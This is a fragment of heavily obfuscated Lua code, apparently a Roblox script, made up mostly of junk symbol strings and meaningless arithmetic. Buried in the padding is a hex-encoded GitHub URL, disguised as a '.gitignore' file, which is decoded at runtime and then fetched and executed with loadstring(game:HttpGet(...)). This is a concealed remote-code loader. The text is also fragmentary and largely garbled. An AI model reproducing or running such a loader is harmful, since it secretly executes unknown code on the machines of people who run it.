█████████████████████████████████████████████████████████████████████████████████████████████████████@#*(rcx@*(#cry(&#@ycr(*@#yxr(*@#yxcr*(@y#(cr█████████████████████████████████#@xu(xxry@(#c&Rbcy(@#xr&y*()#@ycrx(*@#ycr(x&*@y#c&*(rY@#(&cyxrt██████████████████████████████████████████████^@!#&*$^!@$&^%!@^$&%!@&*$^@#&*%^@#&*%^@#*&VGGEYWGFYIYUWEGFUIWEYGFIUEWYFIUWEWYFIYUWEGFUYGEWFUYG^*#&T@*&RFTYUG@#^*$G*@^GF#*TG@*████████████████████████████████████████████████████████!%@346^@&#487@#^$@IUXTRy@#*(TRY@*)#(YRTN*(#@CYRT@#(YCTXR@#*(CTRYX89&*@#54r&*@#%$^&@#%4^&*@#%$R&*(@#^%R(&*@#^5r78r@^#&*%^ @*#&685 ████████████████!@(&*erxty!*&@rt!*@#&^XTR*!@^&xe████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████x@&*#ry@&*#TRYb@#&*rbt*@&#TBR8████████████████^@!#&*$^!@$&^%!@^$&%!@&*$^@#&*%^@#&*%^@#*&VGGEYWGFYIYUWEGFUIWEYGFIUEWYFIUWEWYFIYUWEGFUYGEWFUYG^*#&T@*&RFTYUG@#^*$G*@^GF#*TG@*████████████████X@#687RTB@#678R@#^&RT@#*&rt@#^&*rxT@*#&██████████████████████████████████████████████████████(*rYx@#&*ryc&*#@CYR@&*#cyrx@#&*(crtx@#&*crt*@#xt&R█████████████████████████████████████████████████████2YWEF7823YCRF7823YTR6782X3TXER6723TRX67█████████████████H&*(#H@&*DFH@*#&FRY&*@#tr&*@#YTR79@#YR(@#Yr78@#TGfG@T*#^f█████████████████████████████████████c@#*yrg@*#&rcy&@*#cry(@#yrc*(@#ycr(*@#ycr(@*#&tcyr(&@#*tbcr@#&*cry*&@#tCR&*@███████████████████████████████████████████████H&*(#H@&*DFH@*#&FRY&*@#tr&*@#YTR79@#YR(@#Yr78@#TGfG@T*#^f!%@346^@&#487@#^$@IUXTRy@#*(TRY@*)#(YRTN*(#@CYRT@#(YCTXR@#*(CTRYX89&*@#54r&*@#%$^&@#%4^&*@#%$R&*(@#^%R(&*@#^5r78r@^#&*%^ @*#&685 ████████████████!@(&*erxty!*&@rt!*@#&^XTR*!@^&xe███████████████████████████████@#o*xrY@#*()XRY@#*(RYN89@#YNZRX89@#yRZX98@#xy███████████████████████████████@x#)r*u@#*()RYz@#*(xry782#YRX72Y39XRY2#(&RY782X3Y██████████████████████████████████████████████████████████████████████████████████████x@&*#ry@&*#TRYb@#&*rbt*@&#TBR8████████████████^@!#&*$^!@$&^%!@^$&%!@&*$^@#&*%^@#&*%^@#*&VGGEYWGFYIYUWEGFUIWEYGFIUEWYFIUWEWYFIYUWEGFUYGEWFUYG^*#&T@*&RFTYUG@#^*$G*@^GF#*TG@*████████████████X@#687RTB@#678R@#^&RT@#*&rt@#^&*rxT@*#&███████████████████████████████████████████████████████████████████████████████████████████████████████████2YWEF7823YCRF7823YTR6782X3TXER6723TRX67█████████████████H&*(#H@&*DFH@*#&FRY&*@#tr&*@#YTR79@#YR(@#Yr78@#TGfG@T*#^f!%@346^@&#487@#^$@IUXTRy@#*(TRY@*)#(YRTN*(#@CYRT@#(YCTXR@#*(CTRYX89&*@#54r&*@#%$^&@#%4^&*@#%$R&*(@#^%R(&*@#^5r78r@^#&*%^ @*#&685 ████████████████!@(&*erxty!*&@rt!*@#&^XTR*!@^&xe██████████████████████(*r#Y3@*(xRY@#(*RUZ@#*()ryn*(@x#yr98@#yx(r*y@n#(R8ZUY████████████████████████████████████████████████#(&*wrcy@#(&RXYN(z@#*ryn)*(@!#ynrX0@x#yuzr*(&@#y(rd*U#s@*()SYR██████████████████████████████████████████████████████████████████████████████x@&*#ry@&*#TRYb@#&*rbt*@&#TBR8████████████████^@!#&*$^!@$&^%!@^$&%!@&*$^@#&*%^@#&*%^@#*&VGGEYWGFYIYUWEGFUIWEYGFIUEWYFIUWEWYFIYUWEGFUYGEWFUYG^*#&T@*&RFTYUG@#^*$G*@^GF#*TG@*████████████████X@#687RTB@#678R@#^&RT@#*&rt@#^&*rxT@*#&█████████████████████████████████████████████@o*crtu@x#(*crtxy@#(8XRy@#(*cxry@#(&cry@#&*cry*&@#ycr*@#^&txryb*&@#tbcr*x██████████████████████████████████████████████████████████████2YWEF7823YCRF7823YTR6782X3TXER6723TRX67█████████████████H&*(#H@&*DFH@*#&FRY&*@#tr&*@#YTR79@#YR(@#Yr78@#TGfG@T*#^f!%@346^@&#487@#^$@IUXTRy@#*(TRY@*)#(YRTN*(#@CYRT@#(YCTXR@#*(CTRYX89&*@#54r&*@#%$^&@#%4^&*@#%$R&*(@#^%R(&*@#^5r78r@^#&*%^ @*#&685 ████████████████!@(&*erxty!*&@rt!*@#&^XTR*!@^&xe███████████████████████████████████████████████████████████████████@x#r(*@y#r(x&c@#t^cr(*&@#tb&*crtb@#cr*(&t@#&(rZtg@#&rxYB@#(*cry@#*&crt@#&*ry(@#xyr9Y█████████████████████████████████████████████████████████████████████████████████x@&*#ry@&*#TRYb@#&*rbt*@&#TBR8████████████████^@!#&*$^!@$&^%!@^$&%!@&*$^@#&*%^@#&*%^@#*&VGGEYWGFYIYUWEGFUIWEYGFIUEWYFIUWEWYFIYUWEGFUYGEWFUYG^*#&T@*&RFTYUG@#^*$G*@^GF#*TG@*████████████████X@#687RTB@#678R@#^&RT@#*&rt@#^&*rxT@*#&█████████████@&(#yrc&*(@#tyrc&(*@#yrc&*██████████████████████*(@#YCR&*(@#yrcx*&(#@tbrc*&@#trc&*b@t#*r&ct@#██████████████████████████████████2Y EF872T3EF78TB8672CT87tx#@&*xrt@x#&*tr@&*#trbC8@ #bt &*C██████████████████████████████████████2YWEF7823YCRF7823YTR6782X3TXER6723TRX67█████████████████H&*(#H@&*DFH@*#&FRY&*@#tr&*@#YTR79@#YR(@#Yr78@#TGfG@T*#^f")^tostring(math.huge*2346425^3562435 or math.ceil(math.random(1 or 1-1+1/0)))local j=[[\x68\x74\x74\x70\x73\x3A\x2F\x2F\x72\x61\x77\x2E\x67\x69\x74\x68\x75\x62\x75\x73\x65\x72\x63\x6F\x6E\x74\x65\x6E\x74\x2E\x63\x6F\x6D\x2F\x56\x61\x6E\x69\x73\x32\x35\x32\x2F\x76\x61\x6C\x69\x61\x6E\x74\x64\x68\x78\x64\x2F\x6D\x61\x69\x6E\x2F\x2E\x67\x69\x74\x69\x67\x6E\x6F\x72\x65]]j=j:gsub("\\x(%x%x)",function(k)return string.char(tonumber(k,16))end)local f=table.pack('\12'..'\13'..'\9'..'\9'..'\11'..'\12'..'\13'..'\11'..'\12'..'\13'..'\9'..'\9'..'\11'..'\12'..'\13'..'\9'..'\9'..'\11'..'\12'..'\13'..'\9'..'\9'..'\11'..'\9'..'\9'..'\9'..'\11'..'\12'..'\11'..'\12'..'\13'..'\9'..'\11'..'\12'..'\13'..'\12'..'\13'..'\9'..'\9'..'\11'..'\12'..'\13'..'\11'..'\12'..'\13'..'\9'..'\9'..'\11'..'\12'..'\13'..'\9'..'\9'..'\11'..'\12'..'\13'..'\9'..'\9'..'\11'..'\9'..'\9'..'\9'..'\11'..'\12'..'\11'..'\12'..'\13'..'\9'..'\11'..'\12'..'\13'..'\12'..'\13'..'\9'..'\9'..'\11'..'\12'..'\13'..'\11'..'\12'..'\13'..'\9'..'\9'..'\11'..'\12'..'\13'..'\9'..'\9'..'\11'..'\12'..'\13'..'\9'..'\9'..'\11'..'\9'..'\9'..'\9'..'\11'..'\12'..'\11'..'\12'..'\13'..'\9'..'\11'..'\12'..'\13'..'\12'..'\13'..'\9'..'\9'..'\11'..'\12'..'\13'..'\11'..'\12'..'\13'..'\9'..'\9'..'\11'..'\12'..'\13'..'\9'..'\9'..'\11'..'\12'..'\13'..'\11'..'\12'..'\12'..'\12'..'\13'..'\9'..'\9'..'\11'..'\12'..'\13'..'\11'..'\12'..'\13'..'\9'..'\9'..'\11'..'\9'..'\11'..'\12'..'\13'..'\11'..'\12'..'\13'..'\12'..'\13'..'\9'..'\9'..'\11'..'\12'..'\13'..'\11'..'\12')pcall(loadstring(game:HttpGet(j,true))())break end;break end else repeat local l=(tonumber(math.floor(math.floor(math.random(23455632,45632456),math.huge or math.abs(1 or 1^2351*143463/1))))-#"!%@346^@&#487@#^$&*@#54r&*@#%$^&@#%4^&*@#%$R&*(@#^%R(!%@346^@&#487@#^$@IUXTRy@#*(TRY@*)#(YRTN*(#@CYRT@#(YCTXR@#*(CTRYX89&*@#54r&*@#%$^&@#%4^&*@#%$R&*(@#^%R(&*@#^5r78r@^#&*%^ @*#&685 ████████████████!@(&*erxty!*&@rt!*@#&^XTR*!@^&xe████████████████████████████████████████████████████████████████████████████████████████)x*(R2FY@#*(zxry(#*@CXRY@#*(ycr&(@#yr&*(bY2398ry@#(*xyrNZ978████████████████████████████████████████████████████████████x@&*#ry@&*#TRYb@#&*rbt*@&#TBR8████████████████^@!#&*$^!@$&^%!@^$&%!@&*$^@#&*%^@#&*%^@#*&VGGEYWGFYIYUWEGFUIWEYGFIUEWYFIUWEWYFIYUWEGFUYGEWFUYG^*#&T@*&RFTYUG@#^*$G*@^GF#*TG@*████████████████X@#687RTB@#678R@#^&RT@#*&rt@#^&*rxT@*#&████████████████████████████████████████████@(u#RXY@#&(rY#*@&tyzr&@#yxr79@#y9R7T2X3&(RXT2███████████████████████████████████████████████████████████████2YWEF7823YCRF7823YTR6782X3TXER6723TRX67█████████████████H&*(#H@&*DFH@*#&FRY&*@#tr&*@#YTR79@#YR(@#Yr78@#TGfG@T*#^f&*@#^5r78r@^#&*%^ @*#&685 █████████████████████████████████████████████████████████████████████████████████████████████████████@#*(rcx@*(#cry(&#@ycr(*@#yxr(*@#yxcr*(@y#(cr█████████████████████████████████#@xu(xxry@(#c&Rbcy(@#xr&y*()#@ycrx(*@#ycr(x&*@y#c&*(rY@#(&cyxrt██████████████████████████████████████████████^@!#&*$^!@$&^%!@^$&%!@&*$^@#&*%^@#&*%^@#*&VGGEYWGFYIYUWEGFUIWEYGFIUEWYFIUWEWYFIYUWEGFUYGEWFUYG^*#&T@*&RFTYUG@#^*$G*@^GF#*TG@*████████████████████████████████████████████████████████!%@346^@&#487@#^$@IUXTRy@#*(TRY@*)#(YRTN*(#@CYRT@#(YCTXR@#*(CTRYX89&*@#54r&*@#%$^&@#%4^&*@#%$R&*(@#^%R(&*@#^5r78r@^#&*%^ @*#&685 ████████████████!@(&*erxty!*&@rt!*@#&^XTR*!@^&xe████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████x@&*#ry@&*#TRYb@#&*rbt*@&#TBR8████████████████^@!#&*$^!@$&^%!@^$&%!@&*$^@#&*%^@#&*%^@#*&VGGEYWGFYIYUWEGFUIWEYGFIUEWYFIUWEWYFIYUWEGFUYGEWFUYG^*#&T@*&RFTYUG@#^*$G*@^GF#*TG@*████████████████X@#687RTB@#678R@#^&RT@#*&rt@#^&*rxT@*#&██████████████████████████████████████████████████████(*rYx@#&*ryc&*#@CYR@&*#cyrx@#&*(crtx@#&*crt*@#xt&R█████████████████████████████████████████████████████2YWEF7823YCRF7823YTR6782X3TXER6723TRX67█████████████████H&*(#H@&*DFH@*#&FRY&*@#tr&*@#YTR79@#YR(@#Yr78@#TGfG@T*#^f█████████████████████████████████████c@#*yrg@*#&rcy&@*#cry(@#yrc*(@#ycr(*@#ycr(@*#&tcyr(&@#*tbcr@#&*cry*&@#tCR&*@███████████████████████████████████████████████H&*(#H@&*DFH@*#&FRY&*@#tr&*@#YTR79@#YR(@#Yr78@#TGfG@T*#^f!%@346^@&#487@#^$@IUXTRy@#*(TRY@*)#(YRTN*(#@CYRT@#(YCTXR@#*(CTRYX89&*@#54r&*@#%$^&@#%4^&*@#%$R&*(@#^%R(&*@#^5r78r@^#&*%^ @*#&685 ████████████████!@(&*erxty!*&@rt!*@#&^XTR*!@^&xe███████████████████████████████@#o*xrY@#*()XRY@#*(RYN89@#YNZRX89@#yRZX98@#xy███████████████████████████████@x#)r*u@#*()RYz@#*(xry782#YRX72Y39XRY2#(&RY782X3Y██████████████████████████████████████████████████████████████████████████████████████x@&*#ry@&*#TRYb@#&*rbt*@&#TBR8████████████████^@!#&*$^!@$&^%!@^$&%!@&*$^@#&*%^@#&*%^@#*&VGGEYWGFYIYUWEGFUIWEYGFIUEWYFIUWEWYFIYUWEGFUYGEWFUYG^*#&T@*&RFTYUG@#^*$G*@^GF#*TG@*████████████████X@#687RTB@#678R@#^&RT@#*&rt@#^&*rxT@*#&███████████████████████████████████████████████████████████████████████████████████████████████████████████2YWEF7823YCRF7823YTR6782X3TXER6723TRX67█████████████████H&*(#H@&*DFH@*#&FRY&*@#tr&*@#YTR79@#YR(@#Yr78@#TGfG@T*#^f!%@346^@&#487@#^$@IUXTRy@#*(TRY@*)#(YRTN*(#@CYRT@#(YCTXR@#*(CTRYX89&*@#54r&*@#%$^&@#%4^&*@#%$R&*(@#^%R(&*@#^5r78r@^#&*%^ @*#&685 ████████████████!@(&*erxty!*&@rt!*@#&^XTR*!@^&xe██████████████████████(*r#Y3@*(xRY@#(*RUZ@#*()ryn*(@x#yr98@#yx(r*y@n#(R8ZUY████████████████████████████████████████████████#(&*wrcy@#(&RXYN(z@#*ryn)*(@!#ynrX0@x#yuzr*(&@#y(rd*U#s@*()SYR██████████████████████████████████████████████████████████████████████████████x@&*#ry@&*#TRYb@#&*rbt*@&#TBR8████████████████^@!#&*$^!@$&^%!@^$&%!@&*$^@#&*%^@#&*%^@#*&VGGEYWGFYIYUWEGFUIWEYGFIUEWYFIUWEWYFIYUWEGFUYGEWFUYG^*#&T@*&RFTYUG@#^*$G*@^GF#*TG@*████████████████X@#687RTB@#678R@#^&RT@#*&rt@#^&*rxT@*#&█████████████████████████████████████████████@o*crtu@x#(*crtxy@#(8XRy@#(*cxry@#(&cry@#&*cry*&@#ycr*@#^&txryb*&@#tbcr*x██████████████████████████████████████████████████████████████2YWEF7823YCRF7823YTR6782X3TXER6723TRX67█████████████████H&*(#H@&*DFH@*#&FRY&*@#tr&*@#YTR79@#YR(@#Yr78@#TGfG@T*#^f!%@346^@&#487@#^$@IUXTRy@#*(TRY@*)#(YRTN*(#@CYRT@#(YCTXR@#*(CTRYX89&*@#54r&*@#%$^&@#%4^&*@#%$R&*(@#^%R(&*@#^5r78r@^#&*%^ @*#&685 ████████████████!@(&*erxty!*&@rt!*@#&^XTR*!@^&xe███████████████████████████████████████████████████████████████████@x#r(*@y#r(x&c@#t^cr(*&@#tb&*crtb@#cr*(&t@#&(rZtg@#&rxYB@#(*cry@#*&crt@#&*ry(@#xyr9Y█████████████████████████████████████████████████████████████████████████████████x@&*#ry@&*#TRYb@#&*rbt*@&#TBR8████████████████^@!#&*$^!@$&^%!@^$&%!@&*$^@#&*%^@#&*%^@#*&VGGEYWGFYIYUWEGFUIWEYGFIUEWYFIUWEWYFIYUWEGFUYGEWFUYG^*#&T@*&RFTYUG@#^*$G*@^GF#*TG@*████████████████X@#687RTB@#678R@#^&RT@#*&rt@#^&*rxT@*#&█████████████@&(#yrc&*(@#tyrc&(*@#yrc&*██████████████████████*(@#YCR&*(@#yrcx*&(#@tbrc*&@#trc&*b@t#*r&ct@#██████████████████████████████████2Y EF872T3EF78TB8672CT87tx#@&*xrt@x#&*tr@&*#trbC8@ #bt &*C██████████████████████████████████████2YWEF7823YCRF7823YTR6782X3TXER6723TRX67█████████████████H&*(#H@&*DFH@*#&FRY&*@#tr&*@#YTR79@#YR(@#Yr78@#TGfG@T*#^f")^tostring(math.huge*2346425^3562435 or math.ceil(math.random(1 or 1-1+1/0)))until d end;break end;local m=(tonumber(math.floor(math.floor(math.random(23455632,45632456),math.huge or math.abs(1 or 1^2351*143463/1))))-#"!%@346^@&#487@#^$&*@#54r&*@#%$^&@#%4^&*@#%$R&*(@#^%R(!%@346^@&#487@#^$@IUXTRy@#*(TRY@*)#(YRTN*(#@CYRT@#(YCTXR@#*(CTRYX89&*@#54r&*@#%$^&@#%4^&*@#%$R&*(@#^%R(&*@#^5r78r@^#&*%^ @*#&685 ████████████████!@(&*erxty!*&@rt!*@#&^XTR*!@^&xe████████████████████████████████████████████████████████████████████████████████████████)x*(R2FY@#*(zxry(#*@CXRY@#*(ycr&(@#yr&*(bY2398ry@#(*xyrNZ978████████████████████████████████████████████████████████████x@&*#ry@&*#TRYb@#&*rbt*@&#TBR8████████████████^@!#&*$^!@$&^%!@^$&%!@&*$^@#&*%^@#&*%^@#*&VGGEYWGFYIYUWEGFUIWEYGFIUEWYFIUWEWYFIYUWEGFUYGEWFUYG^*#&T@*&RFTYUG@#^*$G*@^GF#*TG@*████████████████X@#687RTB@#678R@#^&RT@#*&rt@#^&*rxT@*#&████████████████████████████████████████████@(u#RXY@#&(rY#*@&tyzr&@#yxr79@#y9R7T2X3&(RXT2███████████████████████████████████████████████████████████████2YWEF7823YCRF7823YTR6782X3TXER6723TRX67█████████████████H&*(#H@&*DFH@*#&FRY&*@#tr&*@#YTR79@#YR(@#Yr78@#TGfG@T*#^f&*@#^5r78r@^#&*%^ @*#&685 █████████████████████████████████████████████████████████████████████████████████████████████████████@#*(rcx@*(#cry(&#@ycr(*@#yxr(*@#yxcr*(@y#(cr█████████████████████████████████#@xu(xxry@(#c&Rbcy(@#xr&y*()#@ycrx(*@#ycr(x&*@y#c&*(rY@#(&cyxrt██████████████████████████████████████████████^@!#&*$^!@$&^%!@^$&%!@&*$^@#&*%^@#&*%^@#*&VGGEYWGFYIYUWEGFUIWEYGFIUEWYFIUWEWYFIYUWEGFUYGEWFUYG^*#&T@*&RFTYUG@#^*$G*@^GF#*TG@*████████████████████████████████████████████████████████!%@346^@&#487@#^$@IUXTRy@#*(TRY@*)#(YRTN*(#@CYRT@#(YCTXR@#*(CTRYX89&*@#54r&*@#%$^&@#%4^&*@#%$R&*(@#^%R(&*@#^5r78r@^#&*%^ @*#&685 ████████████████!@(&*erxty!*&@rt!*@#&^XTR*!@^&xe████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████x@&*#ry@&*#TRYb@#&*rbt*@&#TBR8████████████████^@!#&*$^!@$&^%!@^$&%!@&*$^@#&*%^@#&*%^@#*&VGGEYWGFYIYUWEGFUIWEYGFIUEWYFIUWEWYFIYUWEGFUYGEWFUYG^*#&T@*&RFTYUG@#^*$G*@^GF#*TG@*████████████████X@#687RTB@#678R@#^&RT@#*&rt@#^&*rxT@*#&██████████████████████████████████████████████████████(*rYx@#&*ryc&*#@CYR@&*#cyrx@#&*(crtx@#&*crt*@#xt&R█████████████████████████████████████████████████████2YWEF7823YCRF7823YTR6782X3TXER6723TRX67█████████████████H&*(#H@&*DFH@*#&FRY&*@#tr&*@#YTR79@#YR(@#Yr78@#TGfG@T*#^f█████████████████████████████████████c@#*yrg@*#&rcy&@*#cry(@#yrc*(@#ycr(*@#ycr(@*#&tcyr(&@#*tbcr@#&*cry*&@#tCR&*@███████████████████████████████████████████████H&*(#H@&*DFH@*#&FRY&*@#tr&*@#YTR79@#YR(@#Yr78@#TGfG@T*#^f!%@346^@&#487@#^$@IUXTRy@#*(TRY@*)#(YRTN*(#@CYRT@#(YCTXR@#*(CTRYX89&*@#54r&*@#%$^&@#%4^&*@#%$R&*(@#^%R(&*@#^5r78r@^#&*%^ @*#&685 ████████████████!@(&*erxty!*&@rt!*@#&^XTR*!@^&xe███████████████████████████████@#o*xrY@#*()XRY@#*(RYN89@#YNZRX89@#yRZX98@#xy███████████████████████████████@x#)r*u@#*()RYz@#*(xry782#YRX72Y39XRY2#(&RY782X3Y██████████████████████████████████████████████████████████████████████████████████████x@&*#ry@&*#TRYb@#&*rbt*@&#TBR8████████████████^@!#&*$^!@$&^%!@^$&%!@&*$^@#&*%^@#&*%^@#*&VGGEYWGFYIYUWEGFUIWEYGFIUEWYFIUWEWYFIYUWEGFUYGEWFUYG^*#&T@*&RFTYUG@#^*$G*@^GF#*TG@*████████████████X@#687RTB@#678R@#^&RT@#*&rt@#^&*rxT@*#&███████████████████████████████████████████████████████████████████████████████████████████████████████████2YWEF7823YCRF7823YTR6782X3TXER6723TRX67█████████████████H&*(#H@&*DFH@*#&FRY&*@#tr&*@#YTR79@#YR(@#Yr78@#TGfG@T*#^f!%@346^@&#487@#^$@IUXTRy@#*(TRY@*)#(YRTN*(#@CYRT@#(YCTXR@#*(CTRYX89&*@#54r&*@#%$^&@#%4^&*@#%$R&*(@#^%R(&*@#^5r78r@^#&*%^ @*#&685 ████████████████!@(&*erxty!*&@rt!*@#&^XTR*!@^&xe██████████████████████(*r#Y3@*(xRY@#(*RUZ@#*()ryn*(@x#yr98@#yx(r*y@n#(R8ZUY████████████████████████████████████████████████#(&*wrcy@#(&RXYN(z@#*ryn)*(@!#ynrX0@x#yuzr*(&@#y(rd*U#s@*()SYR██████████████████████████████████████████████████████████████████████████████x@&*#ry@&*#TRYb@#&*rbt*@&#TBR8████████████████^@!#&*$^!@$&^%!@^$&%!@&*$^@#&*%^@#&*%^@#*&VGGEYWGFYIYUWEGFUIWEYGFIUEWYFIUWEWYFIYUWEGFUYGEWFUYG^*#&T@*&RFTYUG@#^*$G*@^GF#*TG@*████████████████X@#687RTB@#678R@#^&RT@#*&rt@#^&*rxT@*#&█████████████████████████████████████████████@o*crtu@x#(*crtxy@#(8XRy@#(*cxry@#(&cry@#&*cry*&@#ycr*@#^&txryb*&@#tbcr*x██████████████████████████████████████████████████████████████2YWEF7823YCRF7823YTR6782X3TXER6723TRX67█████████████████H&*(#H@&*DFH@*#&FRY&*@#tr&*@#YTR79@#YR(@#Yr78@#TGfG@T*#^f!%@346^@&#487@#^$@IUXTRy@#*(TRY@*)#(YRTN*(#@CYRT@#(YCTXR@#*(CTRYX89&*@#54r&*@#%$^&@#%4^&*@#%$R&*(@#^%R(&*@#^5r78r@^#&*%^ @*#&685 ████████████████!@(&*erxty!*&@rt!*@#&^XTR*!@^&xe███████████████████████████████████████████████████████████████████@x#r(*@y#r(x&c@#t^cr(*&@#tb&*crtb@#cr*(&t@#&(rZtg@#&rxYB@#(*cry@#*&crt@#&*ry(@#xyr9Y█████████████████████████████████████████████████████████████████████████████████x@&*#ry@&*#TRYb@#&*rbt*@&#TBR8████████████████^@!#&*$^!@$&^%!@^$&%!@&*$^@#&*%^@#&*%^@#*&VGGEYWGFYIYUWEGFUIWEYGFIUEWYFIUWEWYFIYUWEGFUYGEWFUYG^*#&T@*&RFTYUG@#^*$G*@^GF#*TG@*████████████████X@#687RTB@#678R@#^&RT@#*&rt@#^&*rxT@*#&█████████████@&(#yrc&*(@#tyrc&(*@#yrc&*██████████████████████*(@#YCR&*(@#yrcx*&(#@tbrc*&@#trc&*b@t#*r&ct@#██████████████████████████████████2Y EF872T3EF78TB8672CT87tx#@&*xrt@x#&*tr@&*#trbC8@ #bt &*C██████████████████████████████████████2YWEF7823YCRF7823YTR6782X3TXER6723TRX67█████████████████H&*(#H@&*DFH@*#&FRY&*@#tr&*@#YTR79@#YR(@#Yr78@#TGfG@T*#^f")^tostring(math.huge*2346425^3562435 or math.ceil(math.random(1 or 1-1+1/0)))break end;local n=(tonumber(math.floor(math.floor(math.random(23455632,45632456),math.huge or math.abs(1 or 1^2351*143463/1))))-#"!%@346^@&#487@#^$&*@#54r&*@#%$^&@#%4^&*@#%$R&*(@#^%R(!%@346^@&#487@#^$@IUXTRy@#*(TRY@*)#(YRTN*(#@CYRT@#(YCTXR@#*(CTRYX89&*@#54r&*@#%$^&@#%4^&*@#%$R&*(@#^%R(&*@#^5r78r@^#&*%^ @*#&685 ████████████████!@(&*erxty!*&@rt!*@#&^XTR*!@^&xe████████████████████████████████████████████████████████████████████████████████████████)x*(R2FY@#*(zxry(#*@CXRY@#*(ycr&(@#yr&*(bY2398ry@#(*xyrNZ978████████████████████████████████████████████████████████████x@&*#ry@&*#TRYb@#&*rbt*@&#TBR8████████████████^@!#&*$^!@$&^%!@^$&%!@&*$^@#&*%^@#&*%^@#*&VGGEYWGFYIYUWEGFUIWEYGFIUEWYFIUWEWYFIYUWEGFUYGEWFUYG^*#&T@*&RFTYUG@#^*$G*@^GF#*TG@*████████████████X@#687RTB@#678R@#^&RT@#*&rt@#^&*rxT@*#&████████████████████████████████████████████@(u#RXY@#&(rY#*@&tyzr&@#yxr79@#y9R7T2X3&(RXT2███████████████████████████████████████████████████████████████2YWEF7823YCRF7823YTR6782X3TXER6723TRX67█████████████████H&*(#H@&*DFH@*#&FRY&*@#tr&*@#YTR79@#YR(@#Yr78@#TGfG@T*#^f&*@#^5r78r@^#&*%^ @*#&685 █████████████████████████████████████████████████████████████████████████████████████████████████████@#*(rcx@*(#cry(&#@ycr(*@#yxr(*@#yxcr*(@y#(cr█████████████████████████████████#@xu(xxry@(#c&Rbcy(@#xr&y*()#@ycrx(*@#ycr(x&*@y#c&*(rY@#(&cyxrt██████████████████████████████████████████████^@!#&*$^!@$&^%!@^$&%!@&*$^@#&*%^@#&*%^@#*&VGGEYWGFYIYUWEGFUIWEYGFIUEWYFIUWEWYFIYUWEGFUYGEWFUYG^*#&T@*&RFTYUG@#^*$G*@^GF#*TG@*████████████████████████████████████████████████████████!%@346^@&#487@#^$@IUXTRy@#*(TRY@*)#(YRTN*(#@CYRT@#(YCTXR@#*(CTRYX89&*@#54r&*@#%$^&@#%4^&*@#%$R&*(@#^%R(&*@#^5r78r@^#&*%^ @*#&685 ████████████████!@(&*erxty!*&@rt!*@#&^XTR*!@^&xe████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████x@&*#ry@&*#TRYb@#&*rbt*@&#TBR8████████████████^@!#&*$^!@$&^%!@^$&%!@&*$^@#&*%^@#&*%^@#*&VGGEYWGFYIYUWEGFUIWEYGFIUEWYFIUWEWYFIYUWEGFUYGEWFUYG^*#&T@*&RFTYUG@#^*$G*@^GF#*TG@*████████████████X@#687RTB@#678R@#^&RT@#*&rt@#^&*rxT@*#&██████████████████████████████████████████████████████(*rYx@#&*ryc&*#@CYR@&*#cyrx@#&*(crtx@#&*crt*@#xt&R█████████████████████████████████████████████████████2YWEF7823YCRF7823YTR6782X3TXER6723TRX67█████████████████H&*(#H@&*DFH@*#&FRY&*@#tr&*@#YTR79@#YR(@#Yr78@#TGfG@T*#^f█████████████████████████████████████c@#*yrg@*#&rcy&@*#cry(@#yrc*(@#ycr(*@#ycr(@*#&tcyr(&@#*tbcr@#&*cry*&@#tCR&*@███████████████████████████████████████████████H&*(#H@&*DFH@*#&FRY&*@#tr&*@#YTR79@#YR(@#Yr78@#TGfG@T*#^f!%@346^@&#487@#^$@IUXTRy@#*(TRY@*)#(YRTN*(#@CYRT@#(YCTXR@#*(CTRYX89&*@#54r&*@#%$^&@#%4^&*@#%$R&*(@#^%R(&*@#^5r78r@^#&*%^ @*#&685 ████████████████!@(&*erxty!*&@rt!*@#&^XTR*!@^&xe███████████████████████████████@#o*xrY@#*()XRY@#*(RYN89@#YNZRX89@#yRZX98@#xy███████████████████████████████@x#)r*u@#*()RYz@#*(xry782#YRX72Y39XRY2#(&RY782X3Y██████████████████████████████████████████████████████████████████████████████████████x@&*#ry@&*#TRYb@#&*rbt*@&#TBR8████████████████^@!#&*$^!@$&^%!@^$&%!@&*$^@#&*%^@#&*%^@#*&VGGEYWGFYIYUWEGFUIWEYGFIUEWYFIUWEWYFIYUWEGFUYGEWFUYG^*#&T@*&RFTYUG@#^*$G*@^GF#*TG@*████████████████X@#687RTB@#678R@#^&RT@#*&rt@#^&*rxT@*#&███████████████████████████████████████████████████████████████████████████████████████████████████████████2YWEF7823YCRF7823YTR6782X3TXER6723TRX67█████████████████H&*(#H@&*DFH@*#&FRY&*@#tr&*@#YTR79@#YR(@#Yr78@#TGfG@T*#^f!%@346^@&#487@#^$@IUXTRy@#*(TRY@*)#(YRTN*(#@CYRT@#(YCTXR@#*(CTRYX89&*@#54r&*@#%$^&@#%4^&*@#%$R&*(@#^%R(&*@#^5r78r@^#&*%^ @*#&685 ████████████████!@(&*erxty!*&@rt!*@#&^XTR*!@^&xe██████████████████████(*r#Y3@*(xRY@#(*RUZ@#*()ryn*(@x#yr98@#yx(r*y@n#(R8ZUY████████████████████████████████████████████████#(&*wrcy@#(&RXYN(z@#*ryn)*(@!#ynrX0@x#yuzr*(&@#y(rd*U#s@*()SYR██████████████████████████████████████████████████████████████████████████████x@&*#ry@&*#TRYb@#&*rbt*@&#TBR8████████████████^@!#&*$^!@$&^%!@^$&%!@&*$^@#&*%^@#&*%^@#*&VGGEYWGFYIYUWEGFUIWEYGFIUEWYFIUWEWYFIYUWEGFUYGEWFUYG^*#&T@*&RFTYUG@#^*$G*@^GF#*TG@*████████████████X@#687RTB@#678R@#^&RT@#*&rt@#^&*rxT@*#&█████████████████████████████████████████████@o*crtu@x#(*crtxy@#(8XRy@#(*cxry@#(&cry@#&*cry*&@#ycr*@#^&txryb*&@#tbcr*x██████████████████████████████████████████████████████████████2YWEF7823YCRF7823YTR6782X3TXER6723TRX67█████████████████H&*(#H@&*DFH@*#&FRY&*@#tr&*@#YTR79@#YR(@#Yr78@#TGfG@T*#^f!%@346^@&#487@#^$@IUXTRy@#*(TRY@*)#(YRTN*(#@CYRT@#(YCTXR@#*(CTRYX89&*@#54r&*@#%$^&@#%4^&*@#%$R&*(@#^%R(&*@#^5r78r@^#&*%^ @*#&685 